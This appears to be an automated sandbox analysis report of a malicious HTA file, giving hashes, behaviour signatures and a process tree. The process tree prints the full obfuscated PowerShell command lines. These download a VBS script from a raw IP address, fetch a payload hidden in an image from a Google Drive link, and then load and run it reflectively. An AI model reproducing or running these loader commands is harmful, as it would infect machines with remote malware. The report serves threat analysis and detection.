Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
29-10-2024 12:37
Static task
static1
Behavioral task
behavioral1
Sample
seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta
Resource
win10v2004-20241007-en
General
-
Target
seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta
-
Size
131KB
-
MD5
196fb761aa0f295e150b75bd8ad638b4
-
SHA1
c209ef825b7f80e43f3c904efbc2df582117eeb0
-
SHA256
86f7ef2ea14259c52d1fe1627978ef45a94fc4234c7328a1492da55a400703d6
-
SHA512
38b7eaff75c6d2cc3b5da4ebb6c345247d35d44b29804c67227404942075db9abf6466716122be3cc4bcb7c8188e0aa3c3b69d9459fd1cff8f5177eaae028b85
-
SSDEEP
96:4vCt7evwlevO+D4xMUrwKtkTt0cZPeIvdDveRAz5hg3vBQ:4vCFUWUiXwK2TpSbBQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2872 poWERSHELl.eXE 6 2884 powershell.exe 8 2884 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2884 powershell.exe 3008 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2872 poWERSHELl.eXE 2744 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 drive.google.com 5 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWERSHELl.eXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2872 poWERSHELl.eXE 2744 powershell.exe 2872 poWERSHELl.eXE 2872 poWERSHELl.eXE 3008 powershell.exe 2884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2872 poWERSHELl.eXE Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 2884 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2472 wrote to memory of 2872 2472 mshta.exe 30 PID 2472 wrote to memory of 2872 2472 mshta.exe 30 PID 2472 wrote to memory of 2872 2472 mshta.exe 30 PID 2472 wrote to memory of 2872 2472 mshta.exe 30 PID 2872 wrote to memory of 2744 2872 poWERSHELl.eXE 32 PID 2872 wrote to memory of 2744 2872 poWERSHELl.eXE 32 PID 2872 wrote to memory of 2744 2872 poWERSHELl.eXE 32 PID 2872 wrote to memory of 2744 2872 poWERSHELl.eXE 32 PID 2872 wrote to memory of 2752 2872 poWERSHELl.eXE 33 PID 2872 wrote to memory of 2752 2872 poWERSHELl.eXE 33 PID 2872 wrote to memory of 2752 2872 poWERSHELl.eXE 33 PID 2872 wrote to memory of 2752 2872 poWERSHELl.eXE 33 PID 2752 wrote to memory of 2828 2752 csc.exe 34 PID 2752 wrote to memory of 2828 2752 csc.exe 34 PID 2752 wrote to memory of 2828 2752 csc.exe 34 PID 2752 wrote to memory of 2828 2752 csc.exe 34 PID 2872 wrote to memory of 760 2872 poWERSHELl.eXE 36 PID 2872 wrote to memory of 760 2872 poWERSHELl.eXE 36 PID 2872 wrote to memory of 760 2872 poWERSHELl.eXE 36 PID 2872 wrote to memory of 760 2872 poWERSHELl.eXE 36 PID 760 wrote to memory of 3008 760 WScript.exe 37 PID 760 wrote to memory of 3008 760 WScript.exe 37 PID 760 wrote to memory of 3008 760 WScript.exe 37 PID 760 wrote to memory of 3008 760 WScript.exe 37 PID 3008 wrote to memory of 2884 3008 powershell.exe 39 PID 3008 wrote to memory of 2884 3008 powershell.exe 39 PID 3008 wrote to memory of 2884 3008 powershell.exe 39 PID 3008 wrote to memory of 2884 3008 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\WinDOWSpoWErSheLl\v1.0\poWERSHELl.eXE"C:\Windows\systEm32\WinDOWSpoWErSheLl\v1.0\poWERSHELl.eXE" "PoWeRSheLL -EX bYPAsS -nOp -W 1 -c DeVIcECRedenTiAlDEploymeNT.eXe ; iex($(Iex('[SYsTeM.TeXt.ENCODinG]'+[chAR]58+[chAR]58+'UTF8.geTStRING([SysteM.CONVERT]'+[CHAR]0x3a+[cHAr]0X3A+'fRomBaSe64STring('+[ChAr]34+'JEREICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlckRlZkluaXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGR0Vkh5Zm5wRUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVnZ3cXksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNvSVVxaVgsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdm0pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMZkJpeHBhTVFhSiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVVUTURZQ2tkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRERDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMy9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzdG9oYXBwZW5lZC50SUYiLCIkRW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc3RvaGFwcC52YlMiLDAsMCk7c1RhUlQtc2xFZVAoMyk7U1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3N0b2hhcHAudmJTIg=='+[CHAr]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -nOp -W 1 -c DeVIcECRedenTiAlDEploymeNT.eXe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1jhmi1uz.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4403.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC43F3.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2828
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithgreatnewswithgoodthingstohapp.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnR1ZDaW1hZ2VVcmwnKycgPSBTcHJodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd24nKydsbycrJ2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciBTcHI7R1ZDd2ViQ2xpJysnZW4nKyd0ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHVkNpbWFnZUJ5dGVzID0nKycgR1ZDd2ViQ2xpZW50LkRvd24nKydsb2FkJysnRGF0YScrJyhHVkNpbWFnZVVybCknKyc7R1ZDaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoR1ZDaW1hZycrJ2VCeXRlcyk7R1YnKydDc3RhcnRGbGFnID0gU3ByPDxCQVNFNjRfU1RBUlQ+PlNwcjtHVkNlbmRGbGFnID0gU3ByPCcrJzxCQVNFNjRfRU5EPj5TcHI7R1ZDc3RhcnRJbmRleCA9IEdWQ2ltYWdlVGV4dC5JbicrJ2RleE9mKEdWQ3N0YXJ0RmxhZyk7R1ZDZW5kSW5kZXggPSBHVkNpJysnbWFnZVRleHQuSW5kZXhPZihHVkNlbmRGbGFnKTtHVkNzdGFydEluZGUnKyd4IC1nZSAwIC1hbmQgR1ZDZScrJ25kSW5kZXggLWd0IEdWQ3MnKyd0YXJ0SW5kZXg7R1ZDc3RhcnRJbmRleCArPSBHVkNzdGFydEZsYWcuTGVuZ3RoO0dWQ2Jhc2U2NExlbmd0aCA9IEdWQ2VuZEluZGV4IC0gR1ZDc3RhcicrJ3RJbmRleDtHVkNiYXNlNjRDb21tYW5kID0gR1ZDaW1hZ2VUZXh0JysnLlN1YnN0cmluZycrJyhHVkNzdGFydEluZGV4LCBHVkNiYXNlNjRMZW5ndGgpO0dWQ2Jhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEdWQ2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBUMHggRm9yRWFjaC1PYmplY3QgeyBHJysnVkNfIH0pWy0xLi4tKEdWQ2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07R1ZDYycrJ29tbWFuZEJ5dGVzID0gW1N5cycrJ3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZyhHVkNiYXNlNjRSZXZlcnNlZCk7R1ZDbG9hZGVkQXNzZW1ibHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZScrJ21ibHldOjpMb2FkKEdWQ2NvbW1hbmRCeXRlcyk7R1ZDdmFpJysnTWV0aG9kID0gW2RuJysnbGliLklPLkhvbWVdLkdldE1ldGhvZChTcHJWQUlTcHIpO0dWQ3ZhaU1ldGhvZC5JbnZva2UoR1ZDbnVsbCwgQChTcHJ0eHQuU0dPTEtMLzMyNC81NTEuODcxLjY0Ljg5MS8vOnB0dGhTcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwckNhc1BvbFNwciwgUycrJ3ByZGVzYXRpdmFkb1NwciwgU3ByZGUnKydzYXRpJysndmFkb1NwcixTcHJkZXNhdGl2YWRvU3ByLFNwJysncmRlc2F0aScrJ3ZhZG9TcHIsU3ByZGVzYXRpdmFkb1NwcixTcHJkZXNhdGl2YWRvU3ByLFNwcmRlc2F0aXZhZG9TcHIsJysnU3ByMVNwcixTcHJkZXNhdGl2YWRvU3ByKSk7JykgLWNyRVBMQWNFIChbY2hhcl04NCtbY2hhcl00OCtbY2hhcl0xMjApLFtjaGFyXTEyNCAtUkVwbGFjZSAoW2NoYXJdNzErW2NoYXJdODYrW2NoYXJdNjcpLFtjaGFyXTM2ICAtY3JFUExBY0UgKFtjaGFyXTgzK1tjaGFyXTExMitbY2hhcl0xMTQpLFtjaGFyXTM5KSB8IElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('GVCimageUrl'+' = Sprhttps://drive.google.com/uc?export=down'+'lo'+'ad&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur Spr;GVCwebCli'+'en'+'t = New-Object System.Net.WebClient;GVCimageBytes ='+' GVCwebClient.Down'+'load'+'Data'+'(GVCimageUrl)'+';GVCimageText = [System.Text.Encoding]::UTF8.GetString(GVCimag'+'eBytes);GV'+'CstartFlag = Spr<<BASE64_START>>Spr;GVCendFlag = Spr<'+'<BASE64_END>>Spr;GVCstartIndex = GVCimageText.In'+'dexOf(GVCstartFlag);GVCendIndex = GVCi'+'mageText.IndexOf(GVCendFlag);GVCstartInde'+'x -ge 0 -and GVCe'+'ndIndex -gt GVCs'+'tartIndex;GVCstartIndex += GVCstartFlag.Length;GVCbase64Length = GVCendIndex - GVCstar'+'tIndex;GVCbase64Command = GVCimageText'+'.Substring'+'(GVCstartIndex, GVCbase64Length);GVCbase64Reversed = '+'-join (GVCbase64Command.ToCharArray() T0x ForEach-Object { G'+'VC_ })[-1..-(GVCbase64Command.Length)];GVCc'+'ommandBytes = [Sys'+'t'+'em.Convert]::FromBas'+'e64String(GVCbase64Reversed);GVCloadedAssembly = '+'[System.Reflection.Asse'+'mbly]::Load(GVCcommandBytes);GVCvai'+'Method = [dn'+'lib.IO.Home].GetMethod(SprVAISpr);GVCvaiMethod.Invoke(GVCnull, @(Sprtxt.SGOLKL/324/551.871.64.891//:ptthSpr, SprdesativadoSpr, SprdesativadoSpr, SprdesativadoSpr, SprCasPolSpr, S'+'prdesativadoSpr, Sprde'+'sati'+'vadoSpr,SprdesativadoSpr,Sp'+'rdesati'+'vadoSpr,SprdesativadoSpr,SprdesativadoSpr,SprdesativadoSpr,'+'Spr1Spr,SprdesativadoSpr));') -crEPLAcE ([char]84+[char]48+[char]120),[char]124 -REplace ([char]71+[char]86+[char]67),[char]36 -crEPLAcE ([char]83+[char]112+[char]114),[char]39) | Iex"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD50c5386bbdfc85042c10b3064fe7f9cbd
SHA12f6eb66b1a3853710d17c9e1ab504d1837dc5d0e
SHA2561c84ffa50ceefea726f146517c6982c44992322036a88f9315f202c3070eb587
SHA512ffaf87409e78e2926cf140d771fa89265d763681645021177f05b1be919c426e4bb86886cbc5282961df939f8c8df69d1909e57b512fa4915a1d667643419edf
-
Filesize
7KB
MD5eae98220796654b55fbfb578f3e0b3b7
SHA1c0e4319d40c8094cb5ac7d503b3be7aff0b5fca8
SHA25664560c79433057b3be4f29283a0cfd7edbfe818e84e5160403884f64f8cadd5b
SHA512299bba40a452dc31d8eaf74c5bebb007ce58fceb11f0a17e5123c1745da7121335b0fd8adf2514f4fa69127d8f67be743040f2bd1c9273d629bbe568e4115fb5
-
Filesize
1KB
MD50226c3634ea4ba9c3fd944375cfa45ed
SHA1cbf9ae07ee882294425d838abcc3132dedc8ae48
SHA256381b130bd2e7df039e32f0658112150ef669c46713fba41194b12bcdcd621d4c
SHA5129f874badf1bcc565ab44599e14ee88d3166aad0a4878486dba8cb722cee9d4699ad9bf81693b98be04642f3d97226c73b77dec94896ee5eeb913dc42b6653e46
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5df6f02cabe81eaeabc6123cfbaac41c8
SHA161ead55d3c0d26071551329ff43a01524fc63c50
SHA256e587b74f84f3712b8153eb38c22b96e82bb9067854c7801e47dc04bc391b1151
SHA512bf5bb70c8ac231c35773a33b77dc790f38d89139cb27cfd5a3a1ce1a9ff5c0fb52af19945030c29e2c81e96bc79e0a835c6c461d6c8ec2619df6013a6586ed49
-
Filesize
136KB
MD5e7dde34531d98d4b94175ad3269d5667
SHA1fa9596b284c756bcf9a14dc5ebc2b84607d398ae
SHA2561d85e569b13244ff1ef054cec322a314c9880567b511b6ee817068c0dcd5d38b
SHA512d39505a3951fd19c3809a0640218d39414bfb9efcc0d1c534ee5d9a4d17ddbcf7d3ad40d255a6e8a58d259e7ce61ac9f16e3d55b17d674eadb68997b551b4843
-
Filesize
462B
MD5c3b2cac94b16f2aa7b62978b69741a03
SHA124b7bd8cf3a07a364bd91c2581a9a67cb25c8e3e
SHA256a1d1f69141b09c2027c3ecf1b0eeb0b0d2a1ee67ee96436591461acd6f1b9d20
SHA5123f4ab831992c6ffce0b348f105d13bea0ebdabe992d9d4283ba8671069529acb9e8fa8f3ec227aef6ce7f6180309dea4823b82f9cd78f94e5081f3d748fa0cb7
-
Filesize
309B
MD51bc4cff65159687a686e632c620f6536
SHA154ad494102a80a1895a8c9d3680dd6dc8957c117
SHA2566833fa625590e545bcbc61730d544419253f8f32149850a22e6219fbbf925f85
SHA5124bc6560506e39ae2d81f79a104bfff4307f18b3d6d3fddbf1b923ab6e4948a3ce9dcaf5d6f23eb4f4d83140be69beefc18d2f55ff62315a9eefe984f592923ea
-
Filesize
652B
MD5df89e36de0e93a0835daf99ce1395671
SHA1e63e50a24a98a8299f684f1833bda3baf25e7d11
SHA256f4189aa07c8922cd52f65e81b6978ab94f96b603739a2a3b9f1aebb0d5336472
SHA51217940639413ac61fea0ac167fb48291abc0e64757742b6282bf3276ac860baddd0ed2a59f15106a74a5a602e2a0c705b87475f17a95b97cb78c326b37e0f639f